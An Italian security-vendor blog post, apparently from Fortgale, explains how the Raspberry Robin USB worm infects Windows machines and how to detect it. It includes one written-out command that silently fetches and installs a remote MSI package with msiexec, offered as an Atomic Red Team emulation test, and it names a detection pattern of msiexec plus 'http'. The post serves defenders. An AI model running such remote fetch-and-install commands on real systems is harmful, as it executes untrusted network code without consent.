Raspberry Robin: Come proteggersi

A Maggio del 2022 è stato osservato per la prima volta un nuovo Worm, particolarmente evasivo, che si diffonde nelle reti private e aziendali attraverso chiavette USB compromesse.
A questo nuovo Worm è stato dato il nome “Raspberry Robin“.

I Worm che si propagano attraverso dispositivi USB non sono di certo nuove minacce e molto spesso, trattandosi di vecchi malware, le infrastrutture di comando e controllo risultano offline.

Raspberry Robin è invece una reale minaccia per la sicurezza delle Aziende in quanto:

è attivamente gestito dai criminali;
utilizza una sofisticata catena di compromissione per l’elusione della difesa;
viene utilizzato come ponte per attacchi di tipo Ransomware (fonte);
utilizza sistemi QNAP compromessi come infrastruttura C2 e rete TOR (The Onion Routing).

Proteggersi da una Compromissione

Come accennato in precedenza, il Malware arriva nell’infrastruttura tramite una iniziale compromissione di una Workstation per mezzo di un dispositivo USB.

All’apertura del dispositivo USB viene mostrato alla vittima un classico collegamento Windows:

Link per avvio compromissione Raspberry Robin

Il doppio click su quest’ultimo avvia la catena di compromissione mostrando a video la corretta apertura di una cartella di destinazione lanciando contemporaneamente in esecuzione una serie di comandi malevoli:

Cosa succede durante l'avvio della catena di compromissione del malware Raspberry Robin

Il primo comando malevolo ha la funzione di Downloader, viene sfruttato per l’effettivo download del malware Raspberry Robin:

Una particolarità del Malware è l’utilizzo di server QNAP precedentemente compromessi per poter distribuire il payload malevolo finale.

A questo punto, il download del payload finale completa la fase di compromissione ed avvia le comunicazioni con il server di comando e controllo tipicamente su rete TOR (The Onion Routing):

Grafico semplificato della catena di compromissione Raspberry Robin — Catena di compromissione – fonte

Metodi di rilevamento della minaccia

La difesa di un infrastruttura da una compromissione da malware Raspberry Robin può essere eseguita su diversi livelli.

Il primo metodo: Endpoint Security

Con una visibilità di tutti i sistemi aziendali, è possibile identificare questo genere di compromissione rilevando l’esecuzione di comandi sospetti. In questo caso l’identificazione del processo msiexec associato alla presenza della parola chiave http potrebbe essere un primo campanello d’allarme.

Testare la difesa:

E’ possibile simulare l’attività offensiva, per poter testare l’effettiva capacità difensiva dei sistemi per questo genere di compromissione, lanciando il comando (Test Atomic Red Team):

msiexec.exe /q /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi"

Il secondo metodo: Network e Intelligence Feed

E’ possibile identificare una compromissione da malware Raspberry Robin e simili, utilizzando le informazioni acquisite dal network dell’azienda, seguendo due diversi approcci:

utilizzo di sistemi di tipo Intrusion Detection System:
- in questo caso, se correttamente configurato, il sistema IDS dovrebbe possedere delle regole per l’identificazione del traffico malevolo facendo sniffing delle comunicazioni con il C2.

utilizzo di feed di Intelligence:
- sfruttando le informazioni di feed di intelligence riguardanti i malware e i sistemi offensivi. Basta infatti correlare l’informazione di indirizzi IP e domini per identificare il traffico anomalo!

Attenzione! In questo caso, dal punto di vista difensivo, l’identificazione della minaccia avviene post-compromissione! Il sistema è già compromesso e si potrebbero avere impatti sulle informazioni del sistema vittima.

Difesa Fortgale

Fortgale si occupa della messa in sicurezza delle aziende da questo genere di minacce informatiche e compromissioni! Dalla difesa per attacchi Malware (Ransomware, Worm, Trojan e Spyware) alle compromissioni di sistemi perimetrali attraverso vulnerabilità applicative e sistemistiche.

Identifichiamo gli attaccanti dal primo momento in cui questi provano a muovere i primi passi nei sistemi e nelle reti dell’Azienda.

Con dei servizi specialistici pensati per le diverse caratteristiche aziendali, possiamo intervenire sui diversi aspetti della difesa.

Contatti: info@fortgale.com

La lista dei principali servizi Difensifi di Fortgale

Le statistiche delle principali attività svolte da Fortgale

I settori in cui operano i clienti Fortgale

Articoli esterni riguardanti Raspberry Robin:

qnap raspberry raspberry robin robin

Cookie	Durata	Descrizione
VISITOR_INFO1_LIVE	5 months 27 days	A cookie set by YouTube to measure bandwidth that determines whether the user gets the new or old player interface.
YSC	session	YSC cookie is set by Youtube and is used to track the views of embedded videos on Youtube pages.
yt-remote-connected-devices	never	YouTube sets this cookie to store the video preferences of the user using embedded YouTube video.
yt-remote-device-id	never	YouTube sets this cookie to store the video preferences of the user using embedded YouTube video.
yt.innertube::nextId	never	This cookie, set by YouTube, registers a unique ID to store data on what videos from YouTube the user has seen.
yt.innertube::requests	never	This cookie, set by YouTube, registers a unique ID to store data on what videos from YouTube the user has seen.

Raspberry Robin: come proteggersi